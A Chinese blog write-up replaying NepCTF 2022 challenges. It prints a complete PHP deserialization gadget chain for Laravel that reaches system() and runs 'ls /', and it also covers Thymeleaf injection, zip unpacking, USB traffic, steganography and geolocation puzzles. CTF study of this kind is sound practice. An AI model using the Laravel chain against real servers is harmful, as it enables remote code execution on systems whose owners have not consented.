• [NepCTF2022] 复现


    Just Kidding

    顽皮的HRP用Laravel写了个项目来欢迎大伙来玩Nepctf 2nd,没想到…居然被坏蛋Sharun撅了

    www.zip源码泄露  ,啥也不懂没注意正确的入口在哪里,一直把注意力放在web.php上面 

    没有注意到这里use导入类的路径,跟着路径找到反序列化入口

     

    当时写的过程,确实9.12.2的版本也是用网上流传的9.1.8的链子可以打,

    当时就是没找到正确的入口和路径 

     

    https://github.com/1nhann/vulns/issues

    pop1,直接rce  

    1. namespace Illuminate\Contracts\Queue{
    2. interface ShouldQueue
    3. {
    4. //
    5. }
    6. }
    7. namespace Illuminate\Bus{
    8. class Dispatcher{
    9. protected $container;
    10. protected $pipeline;
    11. protected $pipes = [];
    12. protected $handlers = [];
    13. protected $queueResolver;
    14. function __construct()
    15. {
    16. $this->queueResolver = "system";
    17. }
    18. }
    19. }
    20. namespace Illuminate\Broadcasting{
    21. use Illuminate\Contracts\Queue\ShouldQueue;
    22. class BroadcastEvent implements ShouldQueue {
    23. function __construct()
    24. {
    25. }
    26. }
    27. class PendingBroadcast{
    28. protected $events;
    29. protected $event;
    30. function __construct()
    31. {
    32. $this->event = new BroadcastEvent();
    33. $this->event->connection = "ls /";
    34. $this->events = new \Illuminate\Bus\Dispatcher();
    35. }
    36. }
    37. }
    38. namespace{
    39. $a = new \Illuminate\Broadcasting\PendingBroadcast();
    40. echo base64_encode(serialize($a));
    41. }

     注意payload路径 ,上传后 访问源码可以看到成功rce的回显

     

    Challenger

    顽皮的HRP又换了种语言写项目来欢迎大家,没想到又让Sharun掘了

    java的框架,给了jar, 反编译

    目前没学过java,所以跟着wp走一遍,也是网上的链子打

     Java安全之Thymeleaf 模板注入分析 - nice_0e3 - 博客园

     

     

     

     

    签到题

    binwalk分离图片

    得到压缩包套娃

    1. import zipfile
    2. a=""
    3. for i in range(232,2,-1):
    4. a=str(i)+".zip"
    5. print(a)
    6. with zipfile.ZipFile(a) as zf:
    7. zf.extractall()

    芃哥给的脚本解压,解压到最后

     

    本来找密码爆破,其实是伪加密

    看文件名也知道是键盘流量了

    王一航Usb脚本梭

    少见的base 

    附件就一个jpg试了一下没出来啥信息就放下了,没想到是真签到

    JPHS这工具很少用就忘了, 无密码直接seek 就出来了

     base58 

     

    花花画画画花花 

    附件下载后 是个osz后缀, 当时用010看是压缩包文件头,就改后缀了。。。。

     要正确打开osz文件 

     osu打开,这个是个音乐游戏吧,

     

     

    馅饼?陷阱!

    右下角有个车牌琼,写的时候都没发现,尚德源茶 定位到三亚 发现正好是这里

    左上角就是银行

     

     

  • 相关阅读:
    22下半年:来长沙建第二支团队与所读的30本书(含哲学文学历史书单/笔记)
    本地源制作
    css溢出属性
    【可视化工具】二维矩形装箱可视化 + JS-Canvas实现
    C++:二叉搜索树
    基于矩阵分解模型的协同过滤理论概述(涉及到SVD,SVD++,TimeSVD++)
    腾讯云HAI域AI作画
    Java-Web-Servlet入门1.0
    最近公共祖先(lca)
    文件安全传输系统,如何保障信创环境下数据的安全传输?
  • 原文地址:https://blog.csdn.net/qq_61768489/article/details/125874427